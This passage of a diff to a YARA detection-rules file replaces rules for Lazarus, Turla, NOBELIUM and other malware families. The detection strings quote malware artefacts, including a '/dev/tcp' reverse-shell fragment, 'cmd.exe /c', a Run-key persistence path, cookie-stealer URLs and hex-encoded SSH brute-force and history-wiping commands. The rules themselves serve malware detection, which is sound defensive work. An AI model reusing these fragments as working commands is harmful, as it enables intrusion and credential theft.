+		$s1 = { b8 [3] 74 e8 [2] 00 00 81 ec bc 03 00 00 53 56 57 be [3] 74 8d bd 38 fc ff ff 6a 1b a5 a5 a5 a5 66 a5 59 33 c0 8d bd 4a fc ff ff be [3] 74 f3 ab 66 ab 8d bd b8 fc ff ff 6a 1c a5 a5 a5 a5 59 33 c0 8d bd c8 fc ff ff 6a 07 f3 ab 59 be [3] 74 8d bd 38 fd ff ff 6a 18 f3 a5 66 a5 8b 5d 0c 59 8d bd 56 fd ff ff 83 65 cc 00 f3 ab 66 ab 8a 03 6a 00 8d 4d e0 c7 45 c0 24 00 00 00 c7 45 c4 25 00 00 00 c7 45 c8 23 00 00 00 88 45 e0 ff 15 [3] 74 a1 [3] 74 8d 4d e0 ff 30 6a 00 53 ff 15 [3] 74 8a 45 0f 6a 00 8d 4d d0 c7 45 fc 01 00 00 00 88 45 d0 ff 15 [3] 74 8b 35 [3] 74 bf [3] 74 57 ff d6 59 50 57 8d 4d d0 ff 15 [3] 74 8b 55 d4 8b 0d [3] 74 85 d2 c6 45 fc 02 75 02 8b d1 8b 43 04 85 c0 75 02 8b c1 ff 75 d8 52 50 ff 15 [3] 74 83 c4 0c 85 c0 0f 85 d9 00 00 00 8d 85 b8 fd ff ff 50 68 04 01 00 00 ff 15 [3] 74 8d 85 b8 fd ff ff 50 ff d6 85 c0 59 0f 84 b5 00 00 00 8d 85 b8 fd ff ff 50 ff d6 66 83 bc 45 b6 fd ff ff 2f 59 74 56 8d 85 b8 fd ff ff 50 ff d6 66 83 bc 45 b6 fd ff ff 5c 59 74 41 8d 4d e0 ff 15 [3] 74 8b 7d e4 8b 5d d8 8d 4d e0 ff 15 [3] 74 8b 45 e4 89 45 f0 8d 85 b8 fd ff ff 50 ff d6 59 8d 84 45 b8 fd ff ff 50 8d 85 b8 fd ff ff 50 8d 44 5f fe 50 ff }
+		$s2 = { ff 75 0c 89 45 f0 ff d6 50 ff 75 0c ff 75 f0 ff 15 [3] 74 83 c4 10 85 c0 }
+		$s3 = "pluginkey" fullword wide
+		$s4 = { 55 8b ec 51 33 c0 56 f6 05 [3] 74 01 89 45 fc 0f 85 c6 00 00 00 8a 4d 0b 80 0d [3] 74 01 53 bb [3] 74 57 88 0d [3] 74 50 8b cb ff 15 [3] 74 8b 35 [3] 74 bf [3] 74 57 ff d6 59 50 57 8b cb ff 15 [3] 74 8a 45 0b bb [3] 74 6a 00 8b cb a2 [3] 74 ff 15 [3] 74 bf [3] 74 57 ff d6 59 50 57 8b cb ff 15 [3] 74 8a 45 0b bb [3] 74 6a 00 8b cb a2 [3] 74 ff 15 [3] 74 bf [3] 74 57 ff d6 59 50 57 8b cb ff 15 [3] 74 8a 45 0b bb [3] 74 6a 00 8b cb a2 [3] 74 ff 15 [3] 74 bf [3] 74 57 ff d6 59 50 57 8b cb ff 15 [3] 74 68 [2] e2 74 e8 [2] 00 00 59 5f 33 c0 5b 8b 75 08 8a 4d 0b 68 [3] 74 68 [3] 74 88 0e 50 8b ce 89 46 04 89 46 08 89 46 0c e8 [2] 00 00 8b c6 5e }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 500KB and ( 5 of ( $s* ) and 4 of ( $dbg* ) )
+		uint16( 0 ) == 0x5a4d and filesize > 15KB and 3 of ( $s* )
 }
-rule ARKBIRD_SOLG_Backdoor_APT_Nazar_April_2020_1 : FILE
+rule ARKBIRD_SOLG_APT_MAL_NK_Lazarus_Dacls_June_2020_1 : FILE
 {
 	meta:
-		description = "Detect strings used by APT Nazar"
+		description = "Detect DACLS malware used by APT Lazarus"
 		author = "Arkbird_SOLG"
-		id = "727a1f4e-1371-5a95-bce9-4a4f701a2ac6"
-		date = "2020-04-29"
-		modified = "2023-11-22"
-		reference = "Internal research"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-04-29/Yara_Rule_APT_Bazar-April_2020_1.yar#L3-L29"
+		id = "fb85b83a-4367-5f1d-be06-8a8e906b8df7"
+		date = "2020-06-11"
+		modified = "2020-06-12"
+		reference = "https://twitter.com/batrix20/status/1270924079826997248"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-06-12/Lazarus/Lazarus_June_2020_1.yar#L3-L26"
 		license_url = "N/A"
-		logic_hash = "79028588ac6afd3e3d0d839d10eada9e5382991eebb600b0dae2119bcd7eac93"
+		logic_hash = "ed3e4a7a0490c5e8854d4e1bc8a223658ab9657a03c1b237af1056293a51611b"
 		score = 75
-		quality = 73
+		quality = 48
 		tags = "FILE"
-		hash1 = "2fe9b76496a9480273357b6d35c012809bfa3ae8976813a7f5f4959402e3fbb6"
+		hash1 = "2dd57d67e486d6855df8235c15c9657f39e488ff5275d0ce0fcec7fc8566c64b"
 
 	strings:
-		$s1 = "101;0000;" fullword ascii
-		$s2 = "hodll.dll" fullword ascii
-		$s3 = { 70 73 73 64 6B ?? ?? 2E 73 79 73 }
-		$s4 = { 70 73 73 64 6B ?? ?? 2E 76 78 64 }
-		$s5 = "##$$%%&&''(())**++,,--..//0123456789:;<=>?" fullword ascii
-		$s6 = "SYSTEM\\CurrentControlSet\\Services\\VxD\\MSTCP" fullword ascii
-		$s7 = "removehook" fullword ascii
-		$s8 = "installhook" fullword ascii
-		$s9 = "_crt_debugger_hook" fullword ascii
-		$s10 = "\\Files.txt" fullword ascii
-		$s11 = "\\report.txt" fullword ascii
-		$s12 = "\\Programs.txt" fullword ascii
-		$s13 = "\\Devices.txt" fullword ascii
-		$s14 = "\\music.mp3" fullword ascii
-		$s15 = "\\z.png" fullword ascii
+		$s1 = "bash -i > /dev/tcp/" fullword ascii
+		$s2 = "__mh_execute_header" fullword ascii
+		$s3 = "/bin/bash -c \"" fullword ascii
+		$s4 = "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36" fullword ascii
+		$s5 = "@_gethostbyname" fullword ascii
+		$s6 = "@_gethostname" fullword ascii
+		$s7 = "radr://5614542" fullword ascii
+		$s8 = "sh -c \"" fullword ascii
+		$s9 = "content-type: multipart/form-data" fullword ascii
+		$s10 = "@___stack_chk_fail" fullword ascii
+		$s11 = "/usr/lib/libSystem.B.dylib" fullword ascii
+		$s12 = "@dyld_stub_binder" fullword ascii
 
 	condition:
-		12 of them and filesize > 120KB
+		uint16( 0 ) == 0xfacf and filesize < 200KB and 10 of them
 }
 
-rule ARKBIRD_SOLG_MAL_Stealer_Cookie_July_2020_1 : FILE
+rule ARKBIRD_SOLG_APT_MAL_NK_Lazarus_Nukesped_June_2020_1 : FILE
 {
 	meta:
-		description = "Detect strings used by EdgeCookiesView and ChromeCookiesView in the ressources of the Cookie Stealer"
+		description = "Detect NukeSped malware used by APT Lazarus"
 		author = "Arkbird_SOLG"
-		id = "02a68973-73b2-572a-a358-f0edc921773a"
-		date = "2020-07-09"
-		modified = "2020-07-09"
-		reference = "https://twitter.com/JAMESWT_MHT/status/1281154921811841026"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-07-09/MAL_Stealer_Cookie_July_2020_1.yar#L3-L32"
+		id = "7a5b27df-43bd-544d-8d0f-72e58ce3064c"
+		date = "2020-06-11"
+		modified = "2020-06-12"
+		reference = "https://twitter.com/batrix20/status/1270924079826997248"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-06-12/Lazarus/Lazarus_June_2020_1.yar#L28-L54"
 		license_url = "N/A"
-		logic_hash = "63747567a9dd68ac0d16b67910957cb9bc28d7237f431ac0c76403ca810e1b94"
+		logic_hash = "b1332eb255f8ae9ae6a68ef8ef86d9f5472584cae8161c27186e341990df7eae"
 		score = 75
-		quality = 50
+		quality = 75
 		tags = "FILE"
-		hash1 = "47b2b56c961cdc78bf06eed30737232ba99424b51648418bacacd522a12ad339"
+		hash1 = "90ea1c7806e2d638f4a942b36a533a1da61adedd05a6d80ea1e09527cf2d839b"
 
 	strings:
-		$x1 = "C:\\Users\\admin1\\AppData\\Local\\Temp\\samplebin.exe" fullword wide
-		$x2 = "https://graph.facebook.com/v7.0/act_fb_uid?access_token=fb_access_token&_index=5&_reqName=adaccount&_reqSrc=AdsCMPaymentsAccount" ascii
-		$x3 = "https://graph.facebook.com/v7.0/act_fb_uid?access_token=fb_access_token&_reqName=adaccount&_reqSrc=AdsCMPaymentsAccountDataDispa" ascii
-		$x4 = "Cookie:" fullword ascii
-		$x5 = "autoLoginCookie name=" fullword ascii
-		$x6 = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.113 Safari/537.36" fullword wide
-		$s7 = "https://graph.facebook.com/v7.0/act_fb_uid?access_token=fb_access_token&_priority=HIGH&_reqName=adaccount&_reqSrc=AdsCMAccountSp" ascii
-		$s8 = "https://www.facebook.com/login/device-based/login/" fullword wide
-		$s9 = "api/?sid=" fullword wide
-		$s10 = "/deleteregkey" fullword ascii
-		$s11 = "Old cookies folder of Edge/IE" fullword ascii
-		$s12 = "https://graph.facebook.com/v7.0/me/adaccounts?access_token=fb_access_token&_reqName=me%2Fadaccounts&_reqSrc=AdsTypeaheadDataMana" ascii
-		$s13 = "https://graph.facebook.com/v7.0/me/adaccounts?access_token=fb_access_token&_reqName=me%2Fadaccounts&_reqSrc=AdsTypeaheadDataMana" ascii
-		$s14 = "ChromeCookiesView.exe" fullword wide
-		$s15 = "EdgeCookiesView.exe" fullword wide
-		$s16 = "Software\\Microsoft\\Windows\\CurrentVersion\\Run" fullword wide
-		$s17 = "login/device-based/login" fullword ascii
-		$s18 = "c_user" fullword wide
-		$s19 = "c:\\Projects\\VS2005\\EdgeCookiesView\\Release\\EdgeCookiesView.pdb" fullword ascii
+		$s1 = "%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X" fullword wide
+		$s2 = "<htr<jtb<lt6<tt&<wt" fullword ascii
+		$s3 = "Content-Disposition: form-data; name=\"file\"; filename=\"%s\"" fullword ascii
+		$s4 = "Content-Type: multipart/form-data; boundary=" fullword wide
+		$s5 = "POST" fullword ascii
+		$s6 = "Content-Type: octet-stream" fullword ascii
+		$s7 = "CONOUT$" fullword ascii
+		$s8 = "cmd.exe /c" fullword ascii
+		$s9 = "2>&1" fullword ascii
+		$s10 = "WINHTTP.dll" fullword ascii
+		$s11 = "WinHttpSendRequest" fullword wide
+		$s12 = "ObtainUserAgentString" fullword ascii
+		$s13 = "WS2_32.dll" fullword ascii
+		$s14 = "WinHttpReceiveResponse" fullword ascii
+		$s15 = "GetLogicalDrives" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 2600KB and ( pe.imphash ( ) == "89c8a19cc2d9172de5901988530c700d" or ( ( 3 of ( $x* ) ) and ( 8 of ( $s* ) ) ) )
+		uint16( 0 ) == 0x5a4d and filesize < 100KB and ( pe.imphash ( ) == "c8379f0eeeb3a522f1dd75aa5f1500b0" or 12 of them )
 }
 rule ARKBIRD_SOLG_RAN_Yanluowang_Dec_2021_1 : FILE
 {
@@ -150713,657 +151357,720 @@ rule ARKBIRD_SOLG_RAN_Yanluowang_Dec_2021_1 : FILE
 	condition:
 		uint16( 0 ) == 0x5A4D and filesize > 100KB and all of ( $s* )
 }
-rule ARKBIRD_SOLG_MAL_ELF_Go_Worm_Jul_2021_1 : FILE
+rule ARKBIRD_SOLG_APT_Turla_Bigboss_Apr_2021_1 : FILE
 {
 	meta:
-		description = "Detect the worm written in Go that drops XMRig Miner"
+		description = "Detects new BigBoss implants (SilentMoon/GoldenSky)"
 		author = "Arkbird_SOLG"
-		id = "6f4a9d3a-e038-5d7f-9c18-c380a0b295d2"
-		date = "2021-07-06"
-		modified = "2021-07-06"
-		reference = "https://twitter.com/JAMESWT_MHT/status/1409848815948111877"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-07-06/MAL_ELF_Go_Worm_Jul_2021_1.yara#L1-L22"
+		id = "6f6c8d1e-f2c7-5f08-b1dc-ce726c6d89be"
+		date = "2021-04-06"
+		modified = "2021-07-17"
+		reference = "https://twitter.com/DrunkBinary/status/1304086230540390400"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-07-17/BigBoss/APT_Turla_BigBoss_Apr_2021_1.yara#L1-L21"
 		license_url = "N/A"
-		logic_hash = "be8b95f8aab62d3a2b3376a0481ebc609afcd089e0613d39f258e07366b708a1"
+		logic_hash = "ce0ffdad9eecb79128b6c08c87914f356c86ac631655c76905a06d953add3998"
 		score = 75
-		quality = 61
+		quality = 71
 		tags = "FILE"
-		hash1 = "774ccd1281b02bc9f0c7e7185c424a42cd98bcc758c893e8a96dfb206a02fcbe"
-		hash2 = "bea5a4358184555924ab6c831bf34edf279f4b93d750d5321263439dcf9c245a"
-		tlp = "White"
-		adversary = "-"
+		hash1 = "94421ccb97b784c43d92c4b1438481eee9c907db6b13f6cfc4b86a6bb057ddcd"
+		hash2 = "67bfa585ace8df20deb1d8a05bd4acf2c84c6fa0966276b3ea7607056abe25bb"
+		hash3 = "6ca0b4efe077fe05b2ae871bf50133c706c7090a54d2c3536a6c86ff454caa9a"
 
 	strings:
-		$s1 = { 57 6f 72 6b 65 72 3a 20 28 25 64 29 2c 20 43 68 65 63 6b 20 49 50 28 25 73 29 20 77 69 74 68 20 53 53 48 20 70 6f 72 74 20 69 73 20 6f 70 65 6e 2e 2e 2e }
-		$s2 = { 63 61 74 20 2f 64 65 76 2f 6e 75 6c 6c 20 3e 20 7e 2f 2e 62 61 73 68 5f 68 69 73 74 6f 72 79 20 26 26 20 68 69 73 74 6f 72 79 20 2d 63 }
-		$s3 = { 6e 6f 68 75 70 20 2e 2f 25 73 20 26 3e 20 6d 79 73 71 6c 6c 6f 67 73 20 26 }
-		$s4 = { 72 6d 20 2d 66 20 25 73 20 6d 79 73 71 6c 6c 6f 67 73 }
-		$s5 = { 63 6f 6d 6d 61 6e 64 20 2d 76 20 62 61 73 68 }
-		$s6 = { 53 74 6f 70 20 62 72 75 74 65 20 6f 6e 2c 20 57 6f 72 6b 65 72 3a 20 28 25 64 29 2c 20 54 72 79 3a 20 49 50 3a 20 25 73 2c 20 63 72 65 64 65 6e 74 69 61 6c 3a 20 25 73 2f 25 73 20 28 25 64 2f 25 64 29 3a 20 44 55 52 41 54 49 4f 4e 3a 20 25 66 }
-		$s7 = { 57 6f 72 6b 65 72 3a 20 28 25 64 29 2c 20 54 72 79 3a 20 49 50 3a 20 25 73 2c 20 63 72 65 64 65 6e 74 69 61 6c 3a 20 25 73 2f 25 73 20 28 25 64 2f 25 64 29 }
+		$s1 = { 55 8b ec a1 [2] 40 00 83 ec 3c 50 6a 3c 8d 4d c4 51 68 [2] 40 00 68 [2] 40 00 68 [2] 40 00 ff 15 78 ?? 40 00 8d 45 c4 8d 50 02 8d 49 00 66 8b 08 83 c0 02 66 85 c9 75 f5 2b c2 d1 f8 75 1c 8b 15 [2] 40 00 52 68 [2] 40 00 68 [2] 40 00 68 [2] 40 00 ff 15 [2] 40 00 8b e5 }
+		$s2 = { 5c 00 5c 00 2e 00 5c 00 47 00 6c 00 6f 00 62 00 61 00 6c 00 5c 00 50 00 49 00 50 00 45 00 5c }
+		$s3 = { 5c 5c 25 73 5c 70 69 70 65 5c 25 73 }
+		$s4 = { 5c 00 69 00 6e 00 66 00 5c 00 00 00 [4-16] 2e 00 69 00 6e 00 66 }
+		$s5 = "%d blocks, %d sorted, %d scanned" ascii fullword
+		$s6 = "REMOTE_NS:ERROR:%d" ascii fullword
+		$s7 = { 5c 5c 25 73 5c 69 70 63 24 }
+		$s8 = { 53 00 59 00 53 00 54 00 45 00 4d 00 5c 00 43 00 75 00 72 00 72 00 65 00 6e 00 74 00 43 00 6f 00 6e 00 74 00 72 00 6f 00 6c 00 53 00 65 00 74 00 5c 00 53 00 65 00 72 00 76 00 69 00 63 00 65 00 73 00 5c 00 6c 00 61 00 6e 00 6d 00 61 00 6e 00 73 00 65 00 72 00 76 00 65 00 72 00 5c 00 70 00 61 00 72 00 61 00 6d 00 65 00 74 00 65 00 72 00 73 00 00 00 4e 00 75 00 6c 00 6c 00 53 00 65 00 73 00 73 00 69 00 6f 00 6e 00 50 00 69 00 70 00 65 00 73 00 00 00 00 00 53 00 59 00 53 00 54 00 45 00 4d 00 5c 00 43 00 75 00 72 00 72 00 65 00 6e 00 74 00 43 00 6f 00 6e 00 74 00 72 00 6f 00 6c 00 53 00 65 00 74 00 5c 00 43 00 6f 00 6e 00 74 00 72 00 6f 00 6c 00 5c 00 4c 00 53 00 41 00 00 00 00 00 52 00 65 00 73 00 74 00 72 00 69 00 63 00 74 00 41 00 6e 00 6f 00 6e 00 79 00 6d 00 6f 00 75 00 73 }
 
 	condition:
-		uint32( 0 ) == 0x464c457f and filesize > 900KB and all of ( $s* )
+		uint16( 0 ) == 0x5a4d and filesize > 20KB and 7 of ( $s* )
 }
-rule ARKBIRD_SOLG_MAL_Boombox_May_2021_1 : FILE
+rule ARKBIRD_SOLG_APT_Lazarus_Jun_2021_1 : FILE
 {
 	meta:
-		description = "Detect BoomBox malware"
+		description = "Detect a variant of NukeSped malware"
 		author = "Arkbird_SOLG"
-		id = "b2629c5b-1fb0-5ea1-8661-faf8f1d6b578"
-		date = "2021-05-28"
-		modified = "2021-06-05"
+		id = "0f5d42c0-d6dc-573b-9227-787ccbcaa83d"
+		date = "2021-06-19"
+		modified = "2021-06-21"
 		reference = "Internal Research"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-06-01/NOBELIUM/MAL_BoomBox_May_2021_1.yara#L1-L18"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-06-19/Lazarus/APT_Lazarus_Jun_2021_1.yara#L1-L20"
 		license_url = "N/A"
-		logic_hash = "b88848ead9c992392c99e88a25541b72d825fbd32c3eb83fefc18e7cfbd08cc8"
+		logic_hash = "ea4ce93d54b9b8e5d1d5bb64d37ac26839e2fa3200da3057597d83c4be6d129f"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		hash1 = "0acb884f2f4cfa75b726cb8290b20328c8ddbcd49f95a1d761b7d131b95bafec"
-		hash2 = "8199f309478e8ed3f03f75e7574a3e9bce09b4423bd7eb08bb5bff03af2b7c27"
+		hash1 = "5c2f339362d0cd8e5a8e3105c9c56971087bea2701ea3b7324771b0ea2c26c6c"
+		hash2 = "2dff6d721af21db7d37fc1bd8b673ec07b7114737f4df2fa8b2ecfffbe608a00"
+		hash3 = "1177105e51fa02f9977bd435f9066123ace32b991ed54912ece8f3d4fbeeade4"
 		tlp = "White"
-		adversary = "NOBELIUM"
+		adversary = "Lazarus"
 
 	strings:
-		$s1 = { 13 30 06 00 90 01 00 00 07 00 00 11 1f 1a 28 53 00 00 0a 25 72 bc 05 00 70 28 1e 00 00 0a 0a 06 28 54 00 00 0a 2d 07 06 28 55 00 00 0a 26 72 ea 05 00 70 28 1e 00 00 0a 0b 07 28 54 00 00 0a 2d 22 07 28 55 00 00 0a 26 07 72 12 06 00 70 28 1e 00 00 0a 0b 07 28 54 00 00 0a 2d 07 07 28 55 00 00 0a 26 73 08 00 00 06 25 7e 08 00 00 04 72 1c 06 00 70 6f 06 00 00 06 0c 08 2c 46 08 8e 69 1f 11 59 8d 2b 00 00 01 13 04 08 1f 0a 11 04 16 11 04 8e 69 28 56 00 00 0a 73 05 00 00 06 11 04 7e 09 00 00 04 7e 0a 00 00 04 6f 03 00 00 06 13 05 06 72 3c 06 00 70 28 1e 00 00 0a 11 05 28 57 00 00 0a 06 72 3c 06 00 70 28 1e 00 00 0a 28 58 00 00 0a 2c 46 7e 59 00 00 0a 72 64 06 00 70 17 6f 5a 00 00 0a 13 06 11 06 72 c0 06 00 70 6f 5b 00 00 0a 2d 26 11 06 72 c0 06 00 70 72 e8 06 00 70 06 72 3c 06 00 70 28 1e 00 00 0a 72 12 07 00 70 28 5c 00 00 0a 6f 5d 00 00 0a 7e 08 00 00 04 72 38 07 00 70 6f 06 00 00 06 0d 09 2c 46 09 8e 69 1f 11 59 8d 2b 00 00 01 13 07 09 1f 0a 11 07 16 11 07 8e 69 28 56 00 00 0a 73 05 00 00 06 11 07 7e 09 00 00 04 7e 0a 00 00 04 6f 03 00 00 06 13 08 07 72 58 07 00 70 28 1e 00 00 0a 11 08 28 57 00 00 0a 06 72 3c 06 00 70 28 1e 00 00 0a 28 58 00 00 0a 2c 16 72 84 07 00 70 06 72 9e 07 00 70 28 1e 00 00 0a 28 5e 00 00 0a 26 2a }
-		$s2 = { 13 30 05 00 11 01 00 00 05 00 00 11 02 7b 02 00 00 04 72 0b 03 00 70 28 1e 00 00 0a 28 30 00 00 0a 74 2d 00 00 01 25 20 c0 d4 01 00 6f 31 00 00 0a 25 72 86 01 00 70 6f 32 00 00 0a 25 72 98 01 00 70 6f 34 00 00 0a 25 6f 35 00 00 0a 72 71 02 00 70 72 8d 02 00 70 03 28 1e 00 00 0a 6f 36 00 00 0a 25 72 2b 03 00 70 6f 3f 00 00 0a 72 9d 02 00 70 04 72 5d 03 00 70 28 37 00 00 0a 0a 25 6f 35 00 00 0a 72 bb 02 00 70 06 6f 38 00 00 0a 25 6f 40 00 00 0a 05 16 05 8e 69 6f 2e 00 00 0a 6f 39 00 00 0a 74 1a 00 00 01 0b 07 6f 3a 00 00 0a 20 c8 00 00 00 33 64 07 6f 3e 00 00 0a 73 41 00 00 0a 6f 42 00 00 0a 0c 02 7b 06 00 00 04 08 6f 43 00 00 0a 6f 44 00 00 0a 17 6f 45 00 00 0a 6f 46 00 00 0a 72 02 04 00 70 28 47 00 00 0a 2c 29 02 7b 03 00 00 04 08 6f 43 00 00 0a 26 02 7b 04 00 00 04 08 6f 43 00 00 0a 26 02 7b 05 00 00 04 08 6f 43 00 00 0a 26 17 2a 16 2a 16 2a }
-		$s3 = { 13 30 04 00 6d 01 00 00 0a 00 00 11 72 f2 07 00 70 28 54 00 00 0a 39 5d 01 00 00 72 [2] 00 70 72 f2 07 00 70 28 5e 00 00 0a 26 1f 1a 28 53 00 00 0a 72 ?? 08 00 70 28 1e 00 00 0a 28 58 00 00 0a 3a 32 01 00 00 1f 0a 8d 2b 00 00 01 25 d0 0c 00 00 04 28 67 00 00 0a 0a 1d 8d 2b 00 00 01 25 d0 0b 00 00 04 28 67 00 00 0a 0b 28 4b 00 00 0a 6f 4c 00 00 0a 28 0c 00 00 06 26 72 d5 00 00 70 28 49 00 00 0a 6f 4a 00 00 0a 28 0c 00 00 06 0c 73 0a 00 00 06 6f 09 00 00 06 0d 09 2c 56 28 68 00 00 0a 09 6f 61 00 00 0a 13 05 73 05 00 00 06 11 05 7e 09 00 00 04 7e 0a 00 00 04 6f 04 00 00 06 13 06 06 11 06 28 0d 00 00 06 13 07 11 07 07 28 0d 00 00 06 13 07 73 08 00 00 06 7e 08 00 00 04 72 ?? 08 00 70 08 28 10 00 00 0a 11 07 6f 07 00 00 06 26 28 0b 00 00 06 28 4b 00 00 0a 6f 4c 00 00 0a 13 04 11 04 72 d5 00 00 70 28 69 00 00 0a 2c 65 73 02 00 00 06 11 04 6f 01 00 00 06 13 08 11 08 2c 53 73 05 00 00 06 28 68 00 00 0a 11 08 6f 61 00 00 0a 7e 09 00 00 04 7e 0a 00 00 04 6f 04 00 00 06 13 09 06 11 09 28 0d 00 00 06 13 0a 11 0a 07 28 0d 00 00 06 13 0a 73 08 00 00 06 7e 08 00 00 04 72 ?? 08 00 70 08 28 10 00 00 0a 11 0a 6f 07 00 00 06 26 2a }
-		$s4 = { 1b 30 05 00 b5 00 00 00 06 00 00 11 72 76 05 00 70 72 d5 00 00 70 28 49 00 00 0a 6f 4a 00 00 0a 28 10 00 00 0a 0a 72 84 05 00 70 28 4b 00 00 0a 6f 4c 00 00 0a 28 10 00 00 0a 0b 72 90 05 00 70 0c 28 4d 00 00 0a 28 49 00 00 0a 6f 4e 00 00 0a 13 04 16 13 05 2b 2a 11 04 11 05 9a 13 06 11 06 6f 4f 00 00 0a 18 33 13 08 11 06 6f 50 00 00 0a 72 98 05 00 70 28 37 00 00 0a 0c 11 05 17 58 13 05 11 05 11 04 8e 69 32 ce 28 51 00 00 0a 6f 52 00 00 0a 0d 72 9c 05 00 70 1a 8d 10 00 00 01 25 16 06 a2 25 17 07 a2 25 18 08 a2 25 19 09 a2 28 1d 00 00 0a 13 07 de 06 26 14 13 07 de 00 11 07 2a 00 00 00 01 10 00 00 00 00 00 00 ac ac 00 06 10 00 00 01 }
+		$seq1 = { 48 8b ce e8 8a 2c 00 00 48 8b d8 48 85 c0 0f 84 28 06 00 00 4c 8b c6 33 d2 48 8b c8 e8 11 56 00 00 8d 4e fc 48 8d 57 04 4c 63 c1 48 8b cb e8 af 3a 00 00 33 c0 48 8d 4c 24 30 48 89 4c 24 28 45 33 c9 4c 8b c3 33 d2 33 c9 89 44 24 30 89 44 24 20 ff 15 4b 49 01 00 48 85 c0 0f 84 d4 05 00 00 ba 88 13 00 00 48 8b c8 ff 15 9c 2c 02 00 48 8d 8d 91 00 00 00 33 d2 41 b8 ff 03 00 00 c6 85 90 00 00 00 00 e8 a9 55 00 00 48 8d 15 02 c1 01 00 48 8d 8d 90 00 00 00 e8 16 2b 00 00 48 8d 85 90 00 00 00 48 83 cb ff 48 ff c3 80 3c 18 00 75 f7 41 b2 84 ba 43 90 21 57 41 b8 c2 a2 a9 09 85 db 0f 8e 4b 05 00 00 4c 8d 8d 90 00 00 00 44 8b db 66 90 41 0f b6 01 41 0f b6 c8 4d 8d 49 01 32 ca 41 32 c2 44 22 d1 41 32 c0 42 8d 0c c5 00 00 00 00 32 c2 41 33 c8 41 88 41 ff 81 e1 f8 07 00 00 41 0f b6 c0 22 c2 c1 e1 14 44 32 d0 41 8b c0 44 8b c1 c1 e8 08 8d 0c 12 33 ca 44 0b c0 8b c2 c1 e1 04 c1 e0 07 33 ca 83 e1 80 33 c8 8b c2 c1 e1 11 c1 e8 08 8b d1 0b d0 49 ff }
+		$seq2 = { 48 8d ac 24 50 ff ff ff 48 81 ec b0 01 00 00 48 8b 05 82 09 02 00 48 33 c4 48 89 85 a0 00 00 00 44 8b 25 d5 38 02 00 4c 8b f9 48 8d 4d 91 33 d2 41 b8 03 01 00 00 c6 45 90 00 e8 59 66 00 00 b9 3c 00 00 00 ff 15 f6 3c 02 00 ff 15 88 59 01 00 8b c8 e8 51 42 00 00 e8 20 42 00 00 b9 3c 00 00 00 8b d8 83 e3 03 83 c3 08 ff 15 d1 3c 02 00 ff 15 63 59 01 00 8b c8 e8 2c 42 00 00 e8 fb 41 00 00 b9 3c 00 00 00 8b f8 83 e7 01 83 c7 05 ff 15 ac 3c 02 00 ff 15 3e 59 01 00 8b c8 e8 07 42 00 00 e8 d6 41 00 00 8b f0 b8 ab aa aa aa f7 e6 d1 ea 8d 0c 52 2b f1 83 eb 08 0f 84 30 03 00 00 ff cb 0f 84 68 02 00 00 ff cb 0f 84 9a 01 00 00 ff cb 0f 85 ef 04 00 00 8d 4b 3c ff 15 60 3c 02 00 ff 15 f2 58 01 00 8b c8 e8 bb 41 00 00 e8 8a 41 00 00 8b d8 b8 1f 85 eb 51 f7 e3 c1 ea 03 6b ca 19 2b d9 b9 3c 00 00 00 83 c3 0a ff 15 2f 3c 02 00 ff 15 c1 58 01 00 8b c8 e8 8a 41 00 00 e8 59 41 00 00 44 8b f0 b8 ab aa aa aa 41 f7 e6 c1 ea 02 8d 0c 52 03 c9 44 2b f1 b9 3c 00 00 00 41 81 c6 d7 07 00 00 ff 15 f5 3b 02 00 ff 15 87 58 01 00 8b c8 e8 50 41 00 00 e8 1f 41 00 00 44 8b e8 b8 ab aa aa aa 41 f7 e5 c1 ea 03 8d 0c 52 c1 e1 02 44 2b e9 b9 3c 00 00 00 41 ff c5 ff 15 be 3b 02 00 ff 15 50 58 01 00 8b c8 e8 19 41 00 00 e8 e8 40 00 00 44 8b c0 b8 09 cb 3d 8d 41 f7 e0 c1 ea 04 6b ca 1d 44 2b c1 b9 7d 00 00 00 41 ff c0 44 89 44 24 74 e8 3e 3b 00 00 33 d2 44 8d 42 7d 48 8b c8 e8 d0 64 00 00 4c 8d 44 24 70 48 8d 0d d4 ce 01 00 ba 7c 00 00 00 c7 44 24 70 00 00 00 00 e8 c2 27 00 00 44 8b 44 24 70 48 8b d0 48 8b c8 48 89 44 24 78 e8 3d 25 00 00 48 8b 44 24 78 4c 8d 45 90 48 8b d0 4c 2b c0 0f 1f 40 00 66 66 0f 1f 84 00 00 00 00 00 0f b6 0a 48 8d 52 01 41 88 4c 10 ff 84 c9 75 f0 48 8b c8 e8 88 3a 00 00 8b 44 24 74 44 89 64 24 48 89 5c 24 40 89 44 24 38 44 89 6c 24 30 48 8d 55 90 44 8b cf 41 b8 04 00 00 00 49 8b cf 44 89 74 24 28 89 74 24 20 e8 b4 39 00 00 e9 5d 03 00 00 b9 3c 00 00 00 ff 15 cc 3a 02 00 ff 15 5e 57 01 00 8b c8 e8 27 40 00 00 e8 f6 3f 00 00 b9 79 00 00 00 8b d8 83 e3 03 e8 63 3a 00 00 33 d2 44 8d 42 79 48 8b c8 e8 f5 63 00 00 4c 8d 44 24 70 48 8d 0d 79 cd 01 00 ba 78 00 00 00 c7 44 24 70 00 00 00 00 e8 e7 26 00 00 44 